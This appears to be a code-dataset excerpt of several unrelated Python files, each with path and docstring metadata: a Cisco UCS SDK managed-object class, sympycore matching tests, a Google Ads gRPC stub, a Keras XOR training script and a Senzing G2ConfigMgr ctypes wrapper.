"rmt_err_code": MoPropertyMeta("rmt_err_code", "rmtErrCode", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["ERR-2fa-auth-retry", "ERR-ACTIVATE-failed", "ERR-ACTIVATE-in-progress", "ERR-ACTIVATE-retry", "ERR-BIOS-TOKENS-OLD-BIOS", "ERR-BIOS-TOKENS-OLD-CIMC", "ERR-BIOS-network-boot-order-not-found", "ERR-BOARDCTRLUPDATE-ignore", "ERR-DIAG-cancelled", "ERR-DIAG-fsm-restarted", "ERR-DIAG-test-failed", "ERR-DNLD-authentication-failure", "ERR-DNLD-hostkey-mismatch", "ERR-DNLD-invalid-image", "ERR-DNLD-no-file", "ERR-DNLD-no-space", "ERR-DNLD-usb-unmounted", "ERR-DNS-delete-error", "ERR-DNS-get-error", "ERR-DNS-set-error", "ERR-Diagnostics-in-progress", "ERR-Diagnostics-memtest-in-progress", "ERR-Diagnostics-network-in-progress", "ERR-FILTER-illegal-format", "ERR-FSM-no-such-state", "ERR-HOST-fru-identity-mismatch", "ERR-HTTP-set-error", "ERR-HTTPS-set-error", "ERR-IBMC-analyze-results", "ERR-IBMC-connect-error", "ERR-IBMC-connector-info-retrieval-error", "ERR-IBMC-fru-retrieval-error", "ERR-IBMC-invalid-end-point-config", "ERR-IBMC-results-not-ready", "ERR-MAX-subscriptions-allowed-error", "ERR-MO-CONFIG-child-object-cant-be-configured", "ERR-MO-META-no-such-object-class", "ERR-MO-PROPERTY-no-such-property", "ERR-MO-PROPERTY-value-out-of-range", "ERR-MO-access-denied", "ERR-MO-deletion-rule-violation", "ERR-MO-duplicate-object", "ERR-MO-illegal-containment", "ERR-MO-illegal-creation", "ERR-MO-illegal-iterator-state", "ERR-MO-illegal-object-lifecycle-transition", "ERR-MO-naming-rule-violation", "ERR-MO-object-not-found", "ERR-MO-resource-allocation", "ERR-NTP-delete-error", "ERR-NTP-get-error", "ERR-NTP-set-error", "ERR-POWER-CAP-UNSUPPORTED", "ERR-POWER-PROFILE-IN-PROGRESS", "ERR-SERVER-mis-connect", "ERR-SWITCH-invalid-if-config", "ERR-TOKEN-request-denied", "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS", "ERR-UPDATE-failed", "ERR-UPDATE-in-progress", "ERR-UPDATE-retry", "ERR-aaa-config-modify-error", "ERR-acct-realm-set-error", "ERR-admin-passwd-set", "ERR-auth-issue", "ERR-auth-realm-get-error", "ERR-auth-realm-set-error", "ERR-authentication", "ERR-authorization-required", "ERR-cli-session-limit-reached", "ERR-create-keyring", "ERR-create-locale", "ERR-create-role", "ERR-create-tp", "ERR-create-user", "ERR-delete-locale", "ERR-delete-role", "ERR-delete-session", "ERR-delete-user", "ERR-downgrade-fail", "ERR-efi-Diagnostics--in-progress", "ERR-enable-mgmt-conn", "ERR-ep-set-error", "ERR-get-max-http-user-sessions", "ERR-http-initializing", "ERR-insufficiently-equipped", "ERR-internal-error", "ERR-ldap-delete-error", "ERR-ldap-get-error", "ERR-ldap-group-modify-error", "ERR-ldap-group-set-error", "ERR-ldap-set-error", "ERR-locale-set-error", "ERR-max-userid-sessions-reached", "ERR-missing-method", "ERR-modify-locale", "ERR-modify-role", "ERR-modify-user", "ERR-modify-user-locale", "ERR-modify-user-role", "ERR-provider-group-modify-error", "ERR-provider-group-set-error", "ERR-radius-get-error", "ERR-radius-global-set-error", "ERR-radius-group-set-error", "ERR-radius-set-error", "ERR-request-timeout", "ERR-reset-adapter", "ERR-role-set-error", "ERR-secondary-node", "ERR-service-not-ready", "ERR-session-cache-full", "ERR-session-not-found", "ERR-set-key-cert", "ERR-set-login-profile", "ERR-set-min-passphrase-length", "ERR-set-network", "ERR-set-password-strength-check", "ERR-set-port-channel", "ERR-store-pre-login-banner-msg", "ERR-tacacs-enable-error", "ERR-tacacs-global-set-error", "ERR-tacacs-group-set-error", "ERR-tacacs-plus-get-error", "ERR-tacacs-set-error", "ERR-test-error-1", "ERR-test-error-2", "ERR-timezone-set-error", "ERR-user-account-expired", "ERR-user-passwd-expired", "ERR-user-set-error", "ERR-xml-parse-error", "none"], ["0-4294967295"]),
"rmt_err_descr": MoPropertyMeta("rmt_err_descr", "rmtErrDescr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rmt_rslt": MoPropertyMeta("rmt_rslt", "rmtRslt", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout),){0,32}(defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout){0,1}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"completionTime": "completion_time",
"currentFsm": "current_fsm",
"descr": "descr",
"dn": "dn",
"fsmStatus": "fsm_status",
"instanceId": "instance_id",
"progress": "progress",
"rmtErrCode": "rmt_err_code",
"rmtErrDescr": "rmt_err_descr",
"rmtRslt": "rmt_rslt",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.completion_time = None
self.current_fsm = None
self.descr = None
self.fsm_status = None
self.instance_id = None
self.progress = None
self.rmt_err_code = None
self.rmt_err_descr = None
self.rmt_rslt = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "IdentMetaSystemFsm", parent_mo_or_dn, **kwargs)
| ucsmsdk/mometa/ident/IdentMetaSystemFsm.py | 18,680 | This is IdentMetaSystemFsm class.
This module contains the general information for IdentMetaSystemFsm ManagedObject. | 116 | en | 0.392342 |
from sympycore import CollectingField as Algebra
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
p = Symbol('p')
s = Symbol('s')
t = Symbol('t')
assert s.matches(s)=={}
assert s.matches(t)==None
assert s.matches(t,{},([s,],[True,]))=={s:t}
assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
s = Symbol('s')
n = Number(2)
assert n.matches(2)=={}
assert n.matches(3)==None
assert n.matches(s)==None
assert n.matches(s+2)==None
def test_wild():
w = Symbol('w')
s = Symbol('s')
wargs = [w],[True]
assert w.matches(Number(2),{},wargs)=={w:2}
assert w.matches(s,{},wargs)=={w:s}
assert w.matches(w,{},wargs)==None
assert w.matches(s+2,{},wargs)=={w:s+2}
assert w.matches(2*s,{},wargs)=={w:2*s}
assert w.matches(s**2,{},wargs)=={w:s**2}
def test_symbol():
s = Symbol('s')
assert s.matches(s)=={}
assert s.matches(2)==None
assert s.matches(2+s)==None
assert s.matches(2*s)==None
assert s.matches(s**2)==None
def test_term():
s = Symbol('s')
p = 2*s
assert p.matches(2*s)=={}
assert p.matches(3*s)==None
assert p.matches(s)==None
assert p.matches(Number(2))==None
assert p.matches(s**2)==None
def _test_wild_term():
w = Symbol('w')
p = 2*w
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
assert p.matches(Number(2),*wargs)=={w:1}
assert p.matches(2*s,*wargs)=={w:s}
assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
assert p.matches(t*s,*wargs)=={w:t*s/2}
assert p.matches(s**2,*wargs)=={w:s**2/2}
m = p.matches(2*s+2,*wargs)
assert m is not None and m[w]==(2*(s+1))/2
assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s+w
wargs = {},([w],[True])
assert p.matches(s+2,*wargs)=={w:2}
assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
w1 = Symbol('w1')
w2 = Symbol('w2')
p = w1 + 2*w2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w1,w2],[True,True])
assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
{w1:2+2*s, w2:t/2}]
def _test_wild_factor():
w = Symbol('w')
p = w**2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
#assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}
#assert p.matches(Number(4),*wargs)=={w:2}
#assert p.matches(Number(16),*wargs)=={w:4}
#assert p.matches(Number(9),*wargs)=={w:3}
#assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}
assert p.matches(s,*wargs)==None
assert p.matches(s**2,*wargs)=={w:s}
assert p.matches(s**3,*wargs)==None
#assert p.matches(s**4,*wargs)=={w:s**2}
assert p.matches(s+2,*wargs)==None
assert p.matches(s*2,*wargs)==None
assert p.matches(s**2*2,*wargs)==None
#assert p.matches(s**2*4,*wargs)=={w:2*s}
#assert p.matches(s**2*t**2,*wargs)=={w:s*t}
#assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}
#assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}
#assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}
assert p.matches(s**2*t**3,*wargs)==None
#assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2}
def _test_wild_symbol_factor():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s*w
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:1/s}
assert p.matches(s,*wargs)=={w:1}
assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
x = Symbol('x')
a,b,c,p,q = map(Symbol, 'abcpq')
e = x
assert e.match(x) == {}
assert e.match(a,a) == {a: x}
e = Number(5)
assert e.match(c,c) == {c: 5}
assert e.match(e) == {}
assert e.match(e+1) == None
def _test_add():
x,y,a,b,c = map(Symbol, 'xyabc')
p,q,r = map(Symbol, 'pqr')
e = a+b
assert e.match(p+b,p) == {p: a}
assert e.match(p+a,p) == {p: b}
e = 1+b
assert e.match(p+b,p) == {p: 1}
e = a+b+c
assert e.match(a+p+c,p) == {p: b}
assert e.match(b+p+c,p) == {p: a}
e = a+b+c+x
assert e.match(a+p+x+c,p) == {p: b}
assert e.match(b+p+c+x,p) == {p: a}
assert e.match(b) == None
assert e.match(b+p,p) == {p: a+c+x}
assert e.match(a+p+c,p) == {p: b+x}
assert e.match(b+p+c,p) == {p: a+x}
e = 4*x+5
assert e.match(3*x+p,p) == {p: x+5}
assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
e = 4*x+5*y+6
assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
(q,lambda expr: not expr.args),
(r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| sympycore/basealgebra/tests/test_matches.py | 5,297 | assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}assert p.matches(Number(4),*wargs)=={w:2}assert p.matches(Number(16),*wargs)=={w:4}assert p.matches(Number(9),*wargs)=={w:3}assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}assert p.matches(s**4,*wargs)=={w:s**2}assert p.matches(s**2*4,*wargs)=={w:2*s}assert p.matches(s**2*t**2,*wargs)=={w:s*t}assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2} | 565 | en | 0.178272 |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v2.proto.resources import feed_item_target_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2
from google.ads.google_ads.v2.proto.services import feed_item_target_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2
class FeedItemTargetServiceStub(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetFeedItemTarget = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/GetFeedItemTarget',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.FromString,
)
self.MutateFeedItemTargets = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/MutateFeedItemTargets',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.FromString,
)
class FeedItemTargetServiceServicer(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def GetFeedItemTarget(self, request, context):
"""Returns the requested feed item targets in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateFeedItemTargets(self, request, context):
"""Creates or removes feed item targets. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_FeedItemTargetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetFeedItemTarget': grpc.unary_unary_rpc_method_handler(
servicer.GetFeedItemTarget,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.SerializeToString,
),
'MutateFeedItemTargets': grpc.unary_unary_rpc_method_handler(
servicer.MutateFeedItemTargets,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.FeedItemTargetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| google/ads/google_ads/v2/proto/services/feed_item_target_service_pb2_grpc.py | 3,507 | Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
Returns the requested feed item targets in full detail.
Creates or removes feed item targets. Operation statuses are returned.
Constructor.
Args:
channel: A grpc.Channel.
Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! | 429 | en | 0.790636 |
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Default module to train a xor classifier and write weights to disk."""
from keras.models import Sequential
from keras.layers.core import Dense, Activation
import keras.optimizers as kop
import numpy as np
import os
from sklearn.preprocessing import StandardScaler
try:
import cPickle as pickle
except Exception as ex:
import pickle
def check_dir_exists(dirname='./pickles'):
"""Check if given dirname exists This will contain all the pickle files."""
if not os.path.exists(dirname):
print("Directory to store pickes does not exist. Creating one now: ./pickles")
os.mkdir(dirname)
def save_x_y_scalar(X_train, Y_train):
"""Use a normalization method on your current dataset and save the coefficients.
Args:
X_train: Input X_train
Y_train: Lables Y_train
Returns:
Normalized X_train,Y_train ( currently using StandardScaler from scikit-learn)
"""
scalar_x = StandardScaler()
X_train = scalar_x.fit_transform(X_train)
scalar_y = StandardScaler()
Y_train = scalar_y.fit_transform(Y_train)
print('dumping StandardScaler objects ..')
pickle.dump(scalar_y,
open('pickles/scalar_y.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(scalar_x,
open('pickles/scalar_x.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
return X_train, Y_train
def create_model(X_train, Y_train):
"""create_model will create a very simple neural net model and save the weights in a predefined directory.
Args:
X_train: Input X_train
Y_train: Lables Y_train
"""
xin = X_train.shape[1]
model = Sequential()
model.add(Dense(units=4, input_shape=(xin, )))
model.add(Activation('tanh'))
model.add(Dense(4))
model.add(Activation('linear'))
model.add(Dense(1))
rms = kop.RMSprop()
print('compiling now..')
model.compile(loss='mse', optimizer=rms)
model.fit(X_train, Y_train, epochs=1000, batch_size=1, verbose=2)
score = model.evaluate(X_train, Y_train, batch_size=1)
print("Evaluation results:", score)
open('pickles/my_model_architecture.json', 'w').write(model.to_json())
print("Saving weights in: ./pickles/my_model_weights.h5")
model.save_weights('pickles/my_model_weights.h5')
if __name__ == '__main__':
X_train = np.array([[1., 1.], [1., 0], [0, 1.], [0, 0]])
Y_train = np.array([[0.], [1.], [1.], [0.]])
check_dir_exists(dirname='./pickles')
X_train, Y_train = save_x_y_scalar(X_train, Y_train)
create_model(X_train, Y_train)
| createpickles.py | 2,671 | Check if given dirname exists This will contain all the pickle files.
create_model will create a very simple neural net model and save the weights in a predefined directory.
Args:
X_train: Input X_train
Y_train: Lables Y_train
Use a normalization method on your current dataset and save the coefficients.
Args:
X_train: Input X_train
Y_train: Lables Y_train
Returns:
Normalized X_train,Y_train ( currently using StandardScaler from scikit-learn)
Default module to train a xor classifier and write weights to disk.
!/usr/bin/env python -*- coding: utf-8 -*- | 593 | en | 0.718868 |
from ctypes import *
import threading
import json
import os
import arcpy
class MyBuffer(threading.local):
def __init__(self):
self.buf = create_string_buffer(65535)
self.bufSize = sizeof(self.buf)
#arcpy.AddMessage("Created new Buffer {}".format(self.buf))
tls_var = MyBuffer()
from .G2Exception import TranslateG2ModuleException, G2ModuleNotInitialized, G2ModuleGenericException
def resize_return_buffer(buf_, size_):
""" callback function that resizes return buffer when it is too small
Args:
size_: size the return buffer needs to be
"""
try:
if not tls_var.buf:
#arcpy.AddMessage("New RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
elif (tls_var.bufSize < size_):
#arcpy.AddMessage("RESIZE_RETURN_BUF {}:{}/{}".format(buf_,size_,tls_var.bufSize))
foo = tls_var.buf
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
memmove(tls_var.buf, foo, sizeof(foo))
except AttributeError:
#arcpy.AddMessage("AttributeError RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
#arcpy.AddMessage("Created new Buffer {}".format(tls_var.buf))
tls_var.bufSize = size_
return addressof(tls_var.buf)
class G2ConfigMgr(object):
"""G2 config-manager module access library
Attributes:
_lib_handle: A boolean indicating if we like SPAM or not.
_resize_func_def: resize function definiton
_resize_func: resize function pointer
_module_name: CME module name
_ini_params: a JSON string containing INI parameters
"""
def initV2(self, module_name_, ini_params_, debug_=False):
""" Initializes the G2 config manager
This should only be called once per process.
Args:
moduleName: A short name given to this instance of the config module
iniParams: A json document that contains G2 system parameters.
verboseLogging: Enable diagnostic logging which will arcpy.AddMessage a massive amount of information to stdout
"""
self._module_name = self.prepareStringArgument(module_name_)
self._ini_params = self.prepareStringArgument(ini_params_)
self._debug = debug_
if self._debug:
arcpy.AddMessage("Initializing G2 Config Manager")
self._lib_handle.G2ConfigMgr_init_V2.argtypes = [c_char_p, c_char_p, c_int]
ret_code = self._lib_handle.G2ConfigMgr_init_V2(self._module_name,
self._ini_params,
self._debug)
if self._debug:
arcpy.AddMessage("Initialization Status: " + str(ret_code))
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def __init__(self):
# type: () -> None
""" Class initialization
"""
try:
if os.name == 'nt':
self._lib_handle = cdll.LoadLibrary("G2.dll")
else:
self._lib_handle = cdll.LoadLibrary("libG2.so")
except OSError as ex:
arcpy.AddMessage("ERROR: Unable to load G2. Did you remember to setup your environment by sourcing the setupEnv file?")
arcpy.AddMessage("ERROR: For more information see https://senzing.zendesk.com/hc/en-us/articles/115002408867-Introduction-G2-Quickstart")
arcpy.AddMessage("ERROR: If you are running Ubuntu or Debian please also review the ssl and crypto information at https://senzing.zendesk.com/hc/en-us/articles/115010259947-System-Requirements")
raise G2ModuleGenericException("Failed to load the G2 library")
self._resize_func_def = CFUNCTYPE(c_char_p, c_char_p, c_size_t)
self._resize_func = self._resize_func_def(resize_return_buffer)
def prepareStringArgument(self, stringToPrepare):
# type: (str) -> str
""" Internal processing function """
#handle null string
if stringToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(stringToPrepare) == str:
return stringToPrepare.encode('utf-8')
#if input is bytearray, assumt utf-8 and convert to str
elif type(stringToPrepare) == bytearray:
return stringToPrepare.decode().encode('utf-8')
elif type(stringToPrepare) == bytes:
return str(stringToPrepare).encode('utf-8')
#input is already a str
return stringToPrepare
def prepareIntArgument(self, valueToPrepare):
# type: (str) -> int
""" Internal processing function """
""" This converts many types of values to an integer """
#handle null string
if valueToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(valueToPrepare) == str:
return int(valueToPrepare.encode('utf-8'))
#if input is bytearray, assumt utf-8 and convert to str
elif type(valueToPrepare) == bytearray:
return int(valueToPrepare)
elif type(valueToPrepare) == bytes:
return int(valueToPrepare)
#input is already an int
return valueToPrepare
def addConfig(self, configStr, configComments, configID):
""" registers a new configuration document in the datastore
"""
_configStr = self.prepareStringArgument(configStr)
_configComments = self.prepareStringArgument(configComments)
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_addConfig.argtypes = [c_char_p, c_char_p, POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_addConfig.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_addConfig(_configStr,_configComments,cID)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
configID += (str(cID.value).encode())
def getConfig(self,configID,response):
""" retrieves the registered configuration document from the datastore
"""
configID_ = self.prepareIntArgument(configID)
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfig.restype = c_int
self._lib_handle.G2ConfigMgr_getConfig.argtypes = [c_longlong, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfig(configID_,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def getConfigList(self,response):
""" retrieves a list of known configurations from the datastore
"""
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfigList.restype = c_int
self._lib_handle.G2ConfigMgr_getConfigList.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfigList(
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def setDefaultConfigID(self,configID):
""" sets the default config identifier in the datastore
"""
configID_ = self.prepareIntArgument(configID)
self._lib_handle.G2ConfigMgr_setDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_setDefaultConfigID.argtypes = [c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_setDefaultConfigID(configID_)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def replaceDefaultConfigID(self,oldConfigID,newConfigID):
""" sets the default config identifier in the datastore
"""
oldConfigID_ = self.prepareIntArgument(oldConfigID)
newConfigID_ = self.prepareIntArgument(newConfigID)
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.argtypes = [c_longlong,c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_replaceDefaultConfigID(oldConfigID_,newConfigID_)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def getDefaultConfigID(self, configID):
""" gets the default config identifier from the datastore
"""
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_getDefaultConfigID.argtypes = [POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_getDefaultConfigID.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_getDefaultConfigID(cID)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
if cID.value:
configID += (str(cID.value).encode())
def clearLastException(self):
""" Clears the last exception
"""
self._lib_handle.G2ConfigMgr_clearLastException.restype = None
self._lib_handle.G2ConfigMgr_clearLastException.argtypes = []
self._lib_handle.G2ConfigMgr_clearLastException()
def getLastException(self):
""" Gets the last exception
"""
self._lib_handle.G2ConfigMgr_getLastException.restype = c_int
self._lib_handle.G2ConfigMgr_getLastException.argtypes = [c_char_p, c_size_t]
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf,sizeof(tls_var.buf))
resultString = tls_var.buf.value.decode('utf-8')
return resultString
def getLastExceptionCode(self):
""" Gets the last exception code
"""
self._lib_handle.G2ConfigMgr_getLastExceptionCode.restype = c_int
self._lib_handle.G2ConfigMgr_getLastExceptionCode.argtypes = []
exception_code = self._lib_handle.G2ConfigMgr_getLastExceptionCode()
return exception_code
def destroy(self):
""" Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
"""
self._lib_handle.G2ConfigMgr_destroy()
| senzing/g2/sdk/python/G2ConfigMgr.py | 12,527 | G2 config-manager module access library
Attributes:
_lib_handle: A boolean indicating if we like SPAM or not.
_resize_func_def: resize function definiton
_resize_func: resize function pointer
_module_name: CME module name
_ini_params: a JSON string containing INI parameters
Class initialization
registers a new configuration document in the datastore
Clears the last exception
Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
retrieves the registered configuration document from the datastore
retrieves a list of known configurations from the datastore
gets the default config identifier from the datastore
Gets the last exception
Gets the last exception code
Initializes the G2 config manager
This should only be called once per process.
Args:
moduleName: A short name given to this instance of the config module
iniParams: A json document that contains G2 system parameters.
verboseLogging: Enable diagnostic logging which will arcpy.AddMessage a massive amount of information to stdout
Internal processing function
Internal processing function
sets the default config identifier in the datastore
callback function that resizes return buffer when it is too small
Args:
size_: size the return buffer needs to be
sets the default config identifier in the datastore
